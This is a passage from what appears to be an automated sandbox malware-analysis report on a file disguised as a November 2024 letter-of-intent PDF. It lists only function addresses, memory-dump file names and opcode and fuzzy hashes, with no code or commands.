                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bbf5e697dc9e4c6f83302953d9275bee8e8cee3bdc4fd9cd364f4f469197a136
                                                                                      • Instruction ID: 73d1c06847aafdfd77396994f84e1f8a2ec6dfdbaceb9e348f8d0e14e9eac963
                                                                                      • Opcode Fuzzy Hash: bbf5e697dc9e4c6f83302953d9275bee8e8cee3bdc4fd9cd364f4f469197a136
                                                                                      • Instruction Fuzzy Hash: A5517B76B01319DFFB11CBA8C840BEEB7B5AF08758F100869DA45FB250DBB5A841CB61
                                                                                      Function 33025B50 Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                      • Instruction ID: 613dbab128f93690e32ef13db84a3879a811715e05c114e5da9a453c3a5b765d
                                                                                      • Opcode Fuzzy Hash: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                      • Instruction Fuzzy Hash: 815108B5A00619EFCB04CF58C881A5AFBF5FF08354B298699E818DB351D335ED62CB94
                                                                                      Function 32FCF71F Relevance: .1, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98f37ac8cbf7d666665b33e1975437584e3d75151828c6c76322629aa1b07c53
                                                                                      • Instruction ID: fcd9ff8159d58037d788d9ac6fad9db257e82911c810e41d4f92ade04ac2bbd0
                                                                                      • Opcode Fuzzy Hash: 98f37ac8cbf7d666665b33e1975437584e3d75151828c6c76322629aa1b07c53
                                                                                      • Instruction Fuzzy Hash: 57416776D0032AABDB159BA49884AAFB7BCAF04754F450A66EB00F7310DB75DD01CBE4
                                                                                      Function 330635D7 Relevance: .1, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                      • Instruction ID: eec3236ad05a792a45aa85912d932903b6a27f6e76144e514d25d96ef83c26c2
                                                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                      • Instruction Fuzzy Hash: D2514875600606EFDB15CF24C580A56BBF9FF45308B1984EAE9089F226E771E946CF90
                                                                                      Function 32F9D534 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a673caef7ddf168d8760278954bc5b95244c663f6f5774f3cb6bee13b11ec83
                                                                                      • Instruction ID: a7b6459d7e6c3977d24f6b5dc40496c2f3d8aaf16dc1f426ce69ff2eebeabfe4
                                                                                      • Opcode Fuzzy Hash: 0a673caef7ddf168d8760278954bc5b95244c663f6f5774f3cb6bee13b11ec83
                                                                                      • Instruction Fuzzy Hash: C551ED76704780DFE316DB18C940B9A73E5AF80B98F4609A5FA04CB7A1EB75DC40CB61
                                                                                      Function 3300D1C0 Relevance: .1, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                      • Instruction ID: c8074f7bbdcb241b6c46249e78e72f81cdc13f47d7d4be97d53edec03abcafad
                                                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                      • Instruction Fuzzy Hash: BB5129B5A00205DFEB08CF69C981699BBF1FF58314B5485AED82997345D734EA80CFA4
                                                                                      Function 32F87A80 Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9266444662a48b1b1dcfb0ec1241ea49c9a7bac75b6c804d5180321b03c08ef
                                                                                      • Instruction ID: 7fb401bef1be779b8fe573281c2a0926b3501ca6ac62188108223d0230635502
                                                                                      • Opcode Fuzzy Hash: b9266444662a48b1b1dcfb0ec1241ea49c9a7bac75b6c804d5180321b03c08ef
                                                                                      • Instruction Fuzzy Hash: B141153A6083229BE324DF24CC50B5BF7A5BF847A4F104D29FA559B290DA74DC05CBD5
                                                                                      Function 32FBDA20 Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 881580a72f2513ba8586f71d510dc4ab2bbafc6b4c51182ed8beefef71e10522
                                                                                      • Instruction ID: a7196a2245cc18b8fd385b18a42fe824724088a4537c9cf825d78b596b86d017
                                                                                      • Opcode Fuzzy Hash: 881580a72f2513ba8586f71d510dc4ab2bbafc6b4c51182ed8beefef71e10522
                                                                                      • Instruction Fuzzy Hash: 7D41D276A08755ABE3309E14C884B5BB3A8AF85B24F050F29EE54973D0DB75D804CBD2
                                                                                      Function 32F8B136 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 205cf5275ccdf531347665ad4b25b3450bff189fce02791f651400fec3877ebf
                                                                                      • Instruction ID: 7f39449cf805d830b0b8e2094ca9aae772ad3e8ffba123ef89c555bc4d59a111
                                                                                      • Opcode Fuzzy Hash: 205cf5275ccdf531347665ad4b25b3450bff189fce02791f651400fec3877ebf
                                                                                      • Instruction Fuzzy Hash: 8041AFB1640706EFE716AF64C890B5ABBE8EF04794F004C69EB21DB260DBB0D811CF90
                                                                                      Function 3303BA0B Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                                      • Instruction ID: 2d1b97ad5d67145cbc62f1caa16ce85046f1f6a9efdb28a03fa7f9d07be3d4e7
                                                                                      • Opcode Fuzzy Hash: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                                      • Instruction Fuzzy Hash: 0D41BCB5A01B019FD725CF69C880B6ABBF5FB86358F0484BED64997750DB70E9018B90
                                                                                      Function 32FBD6E0 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97f1f2830f07c0e01544797f76cfd21ea3a4f4c9a9ced087b3e1cf6525ee585a
                                                                                      • Instruction ID: de4b46dd808e9ad5927f215240825bc96b65406e49f4a4ee18d19abbd4579f63
                                                                                      • Opcode Fuzzy Hash: 97f1f2830f07c0e01544797f76cfd21ea3a4f4c9a9ced087b3e1cf6525ee585a
                                                                                      • Instruction Fuzzy Hash: 3841B376504300AFD724EF69C890F5A77E8EF45764F004E6DEA159B2A1CB71E842CBD2
                                                                                      Function 3301FBDC Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                                      • Instruction ID: e4e42b802b7e4f2c8665294639d4dcef5167b8a2322e0cad6dd5b348314acb86
                                                                                      • Opcode Fuzzy Hash: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                                      • Instruction Fuzzy Hash: 1C41243AA00204EBDB15DF68CD50BAF37B9EF80790F0947A8ED018B291D670DD11DBA0
                                                                                      Function 32F99BC4 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f561c55eacf8f03c7db346d99736ef2e00ae207a397e458f6e011a8f5dc21779
                                                                                      • Instruction ID: a0ed321ef6fdada97f3472cbedfd5252d0b63033ea3e2670b7e5f9ddf18bbe76
                                                                                      • Opcode Fuzzy Hash: f561c55eacf8f03c7db346d99736ef2e00ae207a397e458f6e011a8f5dc21779
                                                                                      • Instruction Fuzzy Hash: 6C413DB5A00329CBFB24CF19CC88AE9B3F5EB54344F1149E9DA0997251EB709E84CE50
                                                                                      Function 32FB9274 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b14409c0806e574be674ce14a870e7104163d1f14c30208b24657827c2a9f550
                                                                                      • Instruction ID: 5fe5eeed6c9ec49f8f7ad45a611d1010ba98209f4ea09d1d49499b0f67e7dd72
                                                                                      • Opcode Fuzzy Hash: b14409c0806e574be674ce14a870e7104163d1f14c30208b24657827c2a9f550
                                                                                      • Instruction Fuzzy Hash: 9431C576A0032CAFDF258B25CC40F9E77B9EF85314F450599A65CAB280DB719D84CF91
                                                                                      Function 3303B2F0 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                      • Instruction ID: 6b20c04a84c50c00cd7a3caab13373944e24f95cf26f9615ffe22a2527e11e36
                                                                                      • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                      • Instruction Fuzzy Hash: A431B071A02721DFD720CF19C480A1AB7F9FF4A368B5888ADE5898B750D7B0E881CF45
                                                                                      Function 32FB50E4 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                      • Instruction ID: 71b41487dd6a2489d90d0f3a104dd307b795bd8b30d2d7e520a96aadb6d2a7d3
                                                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                      • Instruction Fuzzy Hash: 8D312776708341ABFB11DE2ACC00767B7D5AF89794F448D29FA848B391DA79C841C792
                                                                                      Function 32F89730 Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: e24104c1e9a1beecae6f4a737ef364bb32d1a3300d95e5861716fb67e669f9e6
                                                                                      • Instruction ID: 96e5858b2215f8d3516f63fe64e875dd16138119133c62cbd336e0673d352d79
                                                                                      • Opcode Fuzzy Hash: e24104c1e9a1beecae6f4a737ef364bb32d1a3300d95e5861716fb67e669f9e6
                                                                                      • Instruction Fuzzy Hash: E221C276A01718AFD3228F68C800B5EBBF5FB84B54F120D69AB559B751DB74EC01CB90
                                                                                      Function 32F8D6AA Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                      • Instruction ID: f9c5363c0185f4ed609e1e3b800fb930441ab32f2a2ca2c536a14b2a5b041a3f
                                                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                      • Instruction Fuzzy Hash: E8318FBBA01248AFEB128E64C980B5EB3B9DF84754F558C28AF059B250DA70DD40CB90
                                                                                      Function 32F992C5 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                      • Instruction ID: 1a4f990677976ba469ab07373a3b569c54f0257ae7e7d1e2724556f3ee99e163
                                                                                      • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                      • Instruction Fuzzy Hash: 9A317AB66083499FD705CF18D840A8ABBE9FF89350F01096AFE51973A1DB31DC14CBA6
                                                                                      Function 32FE7190 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                      • Instruction ID: a543f6499a43d413f72b4b2ebaacf078061cee24c4ddc5798439923288320e0d
                                                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                      • Instruction Fuzzy Hash: 2D313875604306CFC700CF19C480946BBF5FF89354B2589A9EA589B319EB30ED06CF91
                                                                                      Function 32FCD530 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a17a8bb9c880f94c0eadee94bd9265e16470e842167f53be2872ed620f425b5f
                                                                                      • Instruction ID: 6bc47f702b21cd77fd91fcc7b2f880bbd8fc9a0f5c8924b69a22da29926d6160
                                                                                      • Opcode Fuzzy Hash: a17a8bb9c880f94c0eadee94bd9265e16470e842167f53be2872ed620f425b5f
                                                                                      • Instruction Fuzzy Hash: 9D2100B26043199BE710EF68C950B0F77E8AF44754F010C6AFB149B690EB70D800CFA6
                                                                                      Function 32FA3BD6 Relevance: .1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9345701869807e4b376c96fd79ced99c65470ccf1edf2c1e196986f9eb0fe73e
                                                                                      • Instruction ID: 12e7f3ea71f5d4aeb790a13da09f87189d3e6377653370c3069e46d534296286
                                                                                      • Opcode Fuzzy Hash: 9345701869807e4b376c96fd79ced99c65470ccf1edf2c1e196986f9eb0fe73e
